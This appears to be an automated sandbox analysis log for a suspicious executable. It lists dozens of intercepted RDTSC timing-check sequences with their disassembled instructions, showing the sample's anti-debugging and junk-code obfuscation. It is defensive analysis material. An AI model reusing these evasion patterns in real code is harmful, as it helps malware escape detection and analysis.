Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 727267 second address: 727272 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 727272 second address: 727278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 72F56B second address: 72F592 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FED74F3E531h 0x0000000c ja 00007FED74F3E516h 0x00000012 jmp 00007FED74F3E525h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 72F592 second address: 72F5AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED75508877h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 72F5AD second address: 72F5C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d jc 00007FED74F3E516h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 72F5C2 second address: 72F5CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007FED75508868h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 72F5CF second address: 72F5DA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jl 00007FED74F3E516h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 72F5DA second address: 72F600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007FED75508866h 0x0000000d jmp 00007FED75508879h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 72F72E second address: 72F74B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 je 00007FED74F3E516h 0x0000000b pop edx 0x0000000c pushad 0x0000000d jmp 00007FED74F3E51Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 72FEDD second address: 72FEED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED7550886Bh 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7304B7 second address: 7304BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7304BB second address: 7304C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7304C9 second address: 7304D3 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FED74F3E51Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 734F15 second address: 734F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FED75508866h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 734F1F second address: 734F29 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FED74F3E516h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 734F29 second address: 734F65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007FED75508878h 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f pushad 0x00000010 jmp 00007FED75508877h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6B68CD second address: 6B68D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FED74F3E516h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 733DBC second address: 733DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 733DC0 second address: 733DC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 733DC6 second address: 733DD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jbe 00007FED75508866h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6F966B second address: 6F9670 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6F97B9 second address: 6F97C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 jo 00007FED75508866h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6F97C9 second address: 6F97E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jng 00007FED74F3E520h 0x0000000e jmp 00007FED74F3E51Ah 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6F9896 second address: 6F989A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6F9B9F second address: 6F9BA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6F9BA3 second address: 54BAE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 jmp 00007FED7550886Dh 0x0000000d push dword ptr [ebp+122D0C21h] 0x00000013 jc 00007FED75508866h 0x00000019 mov edx, ecx 0x0000001b call dword ptr [ebp+122D244Ah] 0x00000021 pushad 0x00000022 sub dword ptr [ebp+122D1C6Ch], edi 0x00000028 xor eax, eax 0x0000002a mov dword ptr [ebp+122D1C6Ch], ecx 0x00000030 sub dword ptr [ebp+122D1C6Ch], esi 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a stc 0x0000003b mov dword ptr [ebp+122D36A8h], eax 0x00000041 jmp 00007FED75508871h 0x00000046 mov esi, 0000003Ch 0x0000004b stc 0x0000004c add esi, dword ptr [esp+24h] 0x00000050 mov dword ptr [ebp+122D1C56h], ecx 0x00000056 lodsw 0x00000058 ja 00007FED75508872h 0x0000005e add eax, dword ptr [esp+24h] 0x00000062 pushad 0x00000063 xor dword ptr [ebp+122D1990h], edi 0x00000069 or ebx, 4FB5547Ch 0x0000006f popad 0x00000070 mov ebx, dword ptr [esp+24h] 0x00000074 clc 0x00000075 push eax 0x00000076 js 00007FED75508874h 0x0000007c push eax 0x0000007d push edx 0x0000007e push eax 0x0000007f push edx 0x00000080 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6F9D31 second address: 6F9D8D instructions: 0x00000000 rdtsc 0x00000002 jne 00007FED74F3E51Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 412A02DAh 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FED74F3E518h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b add ecx, 64617E86h 0x00000031 call 00007FED74F3E519h 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FED74F3E528h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6F9D8D second address: 6F9DCB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jp 00007FED75508866h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007FED7550886Ah 0x00000013 jmp 00007FED75508878h 0x00000018 popad 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 ja 00007FED75508866h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6F9DCB second address: 6F9DCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6F9DCF second address: 6F9E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FED75508879h 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f jmp 00007FED75508878h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jnc 00007FED75508871h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6FA08C second address: 6FA091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6FA091 second address: 6FA096 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6FA7FD second address: 6FA801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6FA801 second address: 6FA807 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6FA807 second address: 6FA80B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6FA80B second address: 6FA80F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6FA80F second address: 6FA824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FED74F3E51Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6FAA71 second address: 6FAA77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6FAA77 second address: 6FAB18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 adc cl, 00000076h 0x0000000c lea eax, dword ptr [ebp+12481459h] 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007FED74F3E518h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c mov edi, dword ptr [ebp+122D3838h] 0x00000032 nop 0x00000033 pushad 0x00000034 jmp 00007FED74F3E522h 0x00000039 jmp 00007FED74F3E529h 0x0000003e popad 0x0000003f push eax 0x00000040 push ebx 0x00000041 jmp 00007FED74F3E524h 0x00000046 pop ebx 0x00000047 nop 0x00000048 mov dword ptr [ebp+122D17D4h], ecx 0x0000004e lea eax, dword ptr [ebp+12481415h] 0x00000054 or dword ptr [ebp+1247462Ah], edi 0x0000005a mov dword ptr [ebp+122D2963h], esi 0x00000060 push eax 0x00000061 jc 00007FED74F3E51Eh 0x00000067 push ecx 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7340AE second address: 7340CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FED7550886Ah 0x0000000a pop eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7340CB second address: 7340D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7340D3 second address: 7340DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 73439E second address: 7343BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FED74F3E527h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7346C4 second address: 7346D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 737D5E second address: 737D64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 737D64 second address: 737D6A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 737D6A second address: 737D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 737D78 second address: 737D8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jne 00007FED7550886Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 737D8F second address: 737DA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED74F3E51Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 737DA1 second address: 737DA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 73E97E second address: 73E982 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 73D4BC second address: 73D4C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 73D4C1 second address: 73D4DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED74F3E51Ah 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jnp 00007FED74F3E51Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 73D779 second address: 73D77D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 73D77D second address: 73D783 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 73D783 second address: 73D789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 73D789 second address: 73D7A2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 jbe 00007FED74F3E516h 0x0000000b pop esi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jo 00007FED74F3E516h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 73D7A2 second address: 73D7B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FED75508866h 0x0000000a jbe 00007FED75508866h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 73D7B3 second address: 73D7B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 73D906 second address: 73D929 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508875h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FED7550886Eh 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 73D929 second address: 73D947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 push ecx 0x00000007 jmp 00007FED74F3E525h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 73DAB4 second address: 73DAC3 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FED75508866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 73DC4B second address: 73DC75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007FED74F3E516h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pushad 0x0000000e jmp 00007FED74F3E528h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 73DC75 second address: 73DC79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 73DC79 second address: 73DC7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 73DC7D second address: 73DC83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 73DDE9 second address: 73DE01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E524h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 73E328 second address: 73E32D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 741DD2 second address: 741DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED74F3E51Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 741DE2 second address: 741DF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508870h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 741DF8 second address: 741E09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FED74F3E51Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 744A87 second address: 744A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 744BFE second address: 744C08 instructions: 0x00000000 rdtsc 0x00000002 js 00007FED74F3E516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 744C08 second address: 744C0F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 744C0F second address: 744C29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007FED74F3E521h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 744EFE second address: 744F13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FED75508866h 0x0000000a jmp 00007FED7550886Bh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 749ED4 second address: 749F0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 ja 00007FED74F3E516h 0x0000000d pop ecx 0x0000000e popad 0x0000000f pushad 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 pop edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 ja 00007FED74F3E516h 0x0000001d jc 00007FED74F3E516h 0x00000023 popad 0x00000024 jmp 00007FED74F3E522h 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6B163B second address: 6B1662 instructions: 0x00000000 rdtsc 0x00000002 js 00007FED7550887Dh 0x00000008 jo 00007FED75508866h 0x0000000e jmp 00007FED75508871h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6B1662 second address: 6B167E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E528h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6B167E second address: 6B1684 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6B1684 second address: 6B16B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 jng 00007FED74F3E516h 0x0000000d jmp 00007FED74F3E51Dh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FED74F3E526h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6B16B7 second address: 6B16BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 74918F second address: 7491A4 instructions: 0x00000000 rdtsc 0x00000002 je 00007FED74F3E516h 0x00000008 jmp 00007FED74F3E51Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7491A4 second address: 7491C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FED75508870h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 749491 second address: 749499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 749499 second address: 74949E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
